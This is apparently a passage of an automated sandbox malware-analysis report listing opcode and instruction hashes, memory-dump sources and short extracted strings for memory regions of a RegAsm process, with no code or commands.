                              • Opcode Fuzzy Hash: fe9233e57975e0922be3fa7e85a134f63240c60b896c4afd0caffc3592847879
                              • Instruction Fuzzy Hash: 322115B5D05259AFDB00CFAAD884ACEFFB4FB49314F10856AE518A7201C3746954CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c95f463715937587cd08f19d95b250e6012c66dbe8f440d7f19087a6a113c70a
                              • Instruction ID: 66e7ddbc391d69579e528bd1a13d133898ffcc25de33435a4ebd27cebe779ade
                              • Opcode Fuzzy Hash: c95f463715937587cd08f19d95b250e6012c66dbe8f440d7f19087a6a113c70a
                              • Instruction Fuzzy Hash: 3C012834B042400FCB29A67C9850B2EB7D6DBCA710F108879E50ECB340DA11DD0B47E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3b3e1622f178136b2eac2756733591379500100ff6fb62615c6ce4a33ed0ad6c
                              • Instruction ID: 170a2888922ff86cf420c3cc2455e79a9a149081faca5d0d6309ccf33b08cc9b
                              • Opcode Fuzzy Hash: 3b3e1622f178136b2eac2756733591379500100ff6fb62615c6ce4a33ed0ad6c
                              • Instruction Fuzzy Hash: 2101F535B042114FC755DA7CE81471AB3E6DB86710F14882AE14ACF785EE21DC4687D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2900835221.000000000265D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_265d000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
                              • Instruction ID: cf222324092a7406229af4006ea404157da235a43f7c9fc8de7cc43907d1f24a
                              • Opcode Fuzzy Hash: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
                              • Instruction Fuzzy Hash: 17119D75504284DFDB15CF14D9C4B15BFA1FB88318F28C6AADC494B796C33AD44ACB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 515f15f76caaf4330d17061580ea5ba46878250953d47e05807312b95ecbefe9
                              • Instruction ID: 0c294bcc3734f6ab29e9b300967d2f6127a63f825f58cb945deb38360742a08f
                              • Opcode Fuzzy Hash: 515f15f76caaf4330d17061580ea5ba46878250953d47e05807312b95ecbefe9
                              • Instruction Fuzzy Hash: 9501D832F141251FDB549A79AC146AF77EBDBC8300F14443AD90AD7244EE309C0647D2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4b3d1a5c453ba3b8d6e6176bebc21804063d95fa0341bbf0c2e23b0bf99c4d11
                              • Instruction ID: 65c7252392b59e9b1839a519846f0a19a560ef34ce0c97d298aa33333d3f5af6
                              • Opcode Fuzzy Hash: 4b3d1a5c453ba3b8d6e6176bebc21804063d95fa0341bbf0c2e23b0bf99c4d11
                              • Instruction Fuzzy Hash: 6F11BDB5D01259AFDB00CF9AD984ADEFBB4FB48724F10852AE918B7200C774A954CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 791665e54c503ac7ed6a2cff49ac4f4e5db912b482e960f28249f757e5700721
                              • Instruction ID: 887105f4f0eb783174762b3b7919580e5823dfef08254b421f959027983b8b22
                              • Opcode Fuzzy Hash: 791665e54c503ac7ed6a2cff49ac4f4e5db912b482e960f28249f757e5700721
                              • Instruction Fuzzy Hash: C601D136B002110FEB68957DA81472FB2CBCBC9720F20943AE20ECB744DE61DC4647E6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0065481f2a1e4ac5816650c902fb685fe42aa7ee844b9775e4de368143a28f49
                              • Instruction ID: 9ad553095dedfca0782e704d93ebbecd7f3e66a926d1bd277b0d194bfdd70ff9
                              • Opcode Fuzzy Hash: 0065481f2a1e4ac5816650c902fb685fe42aa7ee844b9775e4de368143a28f49
                              • Instruction Fuzzy Hash: 25018135B001101BDB68967DA85472E62DADBC9710F109839E50ECB340DE62DD0647E5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80a695f5efbf169142d0044753237a9abc4988e20f0740b0e35dfcf9fc29ef7
                              • Instruction ID: 4bf9e48c3d411a7e6d687cc5a2d0a097c7de8a8f80454fc27e8965be68215947
                              • Opcode Fuzzy Hash: a80a695f5efbf169142d0044753237a9abc4988e20f0740b0e35dfcf9fc29ef7
                              • Instruction Fuzzy Hash: BA016D35B041144FDB68EA7DE85472EB3D6D78A721F208829E10ECB784EE21EC4687D5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7e6cbb32ce3283169971434204f17af4ef8724a69cd48393894b56e9780ff0f
                              • Instruction ID: fcf60b284c2b9d3358c19f1b6bc2aa4b6ed10d8a9d7561cc40eecb71e6f4c12d
                              • Opcode Fuzzy Hash: e7e6cbb32ce3283169971434204f17af4ef8724a69cd48393894b56e9780ff0f
                              • Instruction Fuzzy Hash: 6DF0BB75F003185FDF2896A8E84459EBBE5E785324F10453AE51ADB344D631DC09C7D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 593451c276602a8c0fe10303c0804f6c408664db29eb2d33bda327a9b2e6cbf4
                              • Instruction ID: 07843b2aed27ce030ddf870916f1c8f4d2aa5aca1fa095dac35329dd3ffdda9b
                              • Opcode Fuzzy Hash: 593451c276602a8c0fe10303c0804f6c408664db29eb2d33bda327a9b2e6cbf4
                              • Instruction Fuzzy Hash: 8DF0A071D0121AAFCB50EFBA9D0459EBBF9EF4A650F0084BAE955D6200F674C640CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fca1e33231fbc85355ead6fbc86db6951c19b605d8e4bd0704abea8320abaabd
                              • Instruction ID: 6bc636b68fe57ed8b864884ab4d363f9340603999bc9ca5e07caf86508f5e593
                              • Opcode Fuzzy Hash: fca1e33231fbc85355ead6fbc86db6951c19b605d8e4bd0704abea8320abaabd
                              • Instruction Fuzzy Hash: FFE0D871D1924C6BDB50CEB0ED1575A7BA8D782304F2148E6D844CB103F57ACE0983D0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 793bc22b54497ef194a3054277a03eb730c3b3027c5d7e00db46277a7ab8641d
                              • Instruction ID: 73b8a6456de02fba172139fde8a6879dff346ae57851e743d297204f48cfbfa8
                              • Opcode Fuzzy Hash: 793bc22b54497ef194a3054277a03eb730c3b3027c5d7e00db46277a7ab8641d
                              • Instruction Fuzzy Hash: 85E04F71E0021A9F8B90DEB99D042AEBBF9EB45250F108479E919E7204F670C600CBD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-2222239885
                              • Opcode ID: 51305a6368b7aa70ceee37d33dd624a259610c31bf6629324ab7a60e5e0be5cd
                              • Instruction ID: c8adabdc715edcb986526de7c022bd2a0e3b7b38c381d25351d5e7fbee5b85a3
                              • Opcode Fuzzy Hash: 51305a6368b7aa70ceee37d33dd624a259610c31bf6629324ab7a60e5e0be5cd
                              • Instruction Fuzzy Hash: 17120E34E002198FDB68DF69C954AADB7B2BF84304F248569D40AAF355DB309D86CF81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: XPcq$\Ocq
                              • API String ID: 0-2802517751
                              • Opcode ID: b94df86a4159ce25a59843cb24594486ed0b7584428ff696922934f795d53a34
                              • Instruction ID: fa65ca18cf6df1a6be71b7c335406551d98850b5aafed882f1d751a818ad243a
                              • Opcode Fuzzy Hash: b94df86a4159ce25a59843cb24594486ed0b7584428ff696922934f795d53a34
                              • Instruction Fuzzy Hash: 8DE1F331B101148FDB689BB8D4946AEBBF6EF8A320F25846AE446DF351CA31DC45CBD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 43c529bad08ae4b4cefde2a91e19ded7207d9c0e68cfc4cce8f06efb8d576bb0
                              • Instruction ID: f2c346d28c4763134dcd5f74afd6de7d2e53365e6a77dd4450dffbe8c794bdb9
                              • Opcode Fuzzy Hash: 43c529bad08ae4b4cefde2a91e19ded7207d9c0e68cfc4cce8f06efb8d576bb0
                              • Instruction Fuzzy Hash: 2823FB31D10B198ECB15EB68C8905DDF7B1FF99300F15D79AE458AB221EB70AAC5CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: PH^q
                              • API String ID: 0-2549759414
                              • Opcode ID: b5bf154031a9f0f97df5120f50feea65b10bf50246f0d507ca23a826daf79515
                              • Instruction ID: 1180339a6384b1d69b227f0357d30ecd9be9868dcf8d9a7ce5b30fd0273901bd
                              • Opcode Fuzzy Hash: b5bf154031a9f0f97df5120f50feea65b10bf50246f0d507ca23a826daf79515
                              • Instruction Fuzzy Hash: 3F229030B101058FDB58DB68D494A6DB7E2EF89310F248969D80ADF3A5DB36EC49CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2902789579.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_2820000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 691082ec6bd077677f42b2075d7dfbb651ed0e9e721495b5efcfb40d9f8836c1
                              • Instruction ID: fa7a805811a8519d68ecf79b0a74019723fe1a65f2a991d6c1aff6ca320b70c4
                              • Opcode Fuzzy Hash: 691082ec6bd077677f42b2075d7dfbb651ed0e9e721495b5efcfb40d9f8836c1
                              • Instruction Fuzzy Hash: BFB13F78E002198FDB14CFA9D98579DBBF2AF88318F148129D819E7254EB749889CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f3a9f8ce6643c3b476ead23d7ec096314e55fa4d46cebd826cb15957be73e4d5
                              • Instruction ID: 15a0ca145b079a8fb3dd3cd0b2f1747e1b7464cd0678bf6e9536e10e5ffa6e10
                              • Opcode Fuzzy Hash: f3a9f8ce6643c3b476ead23d7ec096314e55fa4d46cebd826cb15957be73e4d5
                              • Instruction Fuzzy Hash: 3EA17F35E2020ADFDF46DFA4C84459EFBB6FF84300B15457AEA16AB261DB31E915CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e496f08a35cb105f50cc6d79a5a1e2f041855ec85d8a824faa3cddb391c3ade
                              • Instruction ID: df7bb77740259169e7357c1f67db5a76f77eda8cd8cd5f13a8aaa3425e3f056d
                              • Opcode Fuzzy Hash: 2e496f08a35cb105f50cc6d79a5a1e2f041855ec85d8a824faa3cddb391c3ade
                              • Instruction Fuzzy Hash: 13815971E2024ACFDF64CF99C8886AEFBB1FB49310F54852AE945E7201C3349991CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-3823777903
                              • Opcode ID: 35472a5b5706f54779bdebb80a370c617465818ab2974203fbcaf0daa71cc2da
                              • Instruction ID: 4644bf4e260aebf596c5513cf675a19ce04f22244fc230c72fff20ffaf5b91cb
                              • Opcode Fuzzy Hash: 35472a5b5706f54779bdebb80a370c617465818ab2974203fbcaf0daa71cc2da
                              • Instruction Fuzzy Hash: 11915B34E012099FEB68DBA9DA54B6EB7F6EF44302F208529D402DF354DB759889CBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-390881366
                              • Opcode ID: f4e7bf17223c9c6787eb68d41cda103599e92a06092b2a2fe0b42bcedbb7a061
                              • Instruction ID: 668bd0ba9b9b245e97fc2558146a9339475b25784f5846cecce6e4d4359355b7
                              • Opcode Fuzzy Hash: f4e7bf17223c9c6787eb68d41cda103599e92a06092b2a2fe0b42bcedbb7a061
                              • Instruction Fuzzy Hash: D7F11B34A00218CFDB59EF69D554A6EB7B3BF84301F248569D4069F3A8DB31EC86CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q$$^q$$^q
                              • API String ID: 0-2125118731
                              • Opcode ID: 1e75f09cb599c54a8d940357c94dbe79c002b2a07ba59ab55135694902fcc6db
                              • Instruction ID: 06ad7003d6a2c8105d2e05584c289e3a277725ea85c560cf1b8ca9f2e71c753d
                              • Opcode Fuzzy Hash: 1e75f09cb599c54a8d940357c94dbe79c002b2a07ba59ab55135694902fcc6db
                              • Instruction Fuzzy Hash: 2CB13A34E002188FDB58EB68D5946AEB7B2EF84300F24896AD406DF354DF75DC86CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: LR^q$LR^q$$^q$$^q
                              • API String ID: 0-2454687669
                              • Opcode ID: ac4fcea967064c6ad04a1b20fcef0a1ed7005c6e2e8687bb6cdfabe7b4722dcb
                              • Instruction ID: 6a9eddc173af4b4fecf32a8b18f2ce3a872cc298ccfaff56054ac4659749ce74
                              • Opcode Fuzzy Hash: ac4fcea967064c6ad04a1b20fcef0a1ed7005c6e2e8687bb6cdfabe7b4722dcb
                              • Instruction Fuzzy Hash: 6F51D631B002058FDB5CEB28D950A6AB7E6FF85304F148569E506DF3A5DB30EC49CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q$$^q$$^q
                              • API String ID: 0-2125118731
                              • Opcode ID: 4750164973e02a52bd69365bff69ab885655210d3ca73ef3cab3c1c0902b145e
                              • Instruction ID: 9464b3611610052635b1f322dd07a7ddebae0f39e1b0143a39fdc2d16bc724ed
                              • Opcode Fuzzy Hash: 4750164973e02a52bd69365bff69ab885655210d3ca73ef3cab3c1c0902b145e
                              • Instruction Fuzzy Hash: D251B134E122049FDB69DB68D8905AEB3B6EF88312F20452AD806DF354DB31DC89CB91
                              Uniqueness

                              Uniqueness Score: -1.00%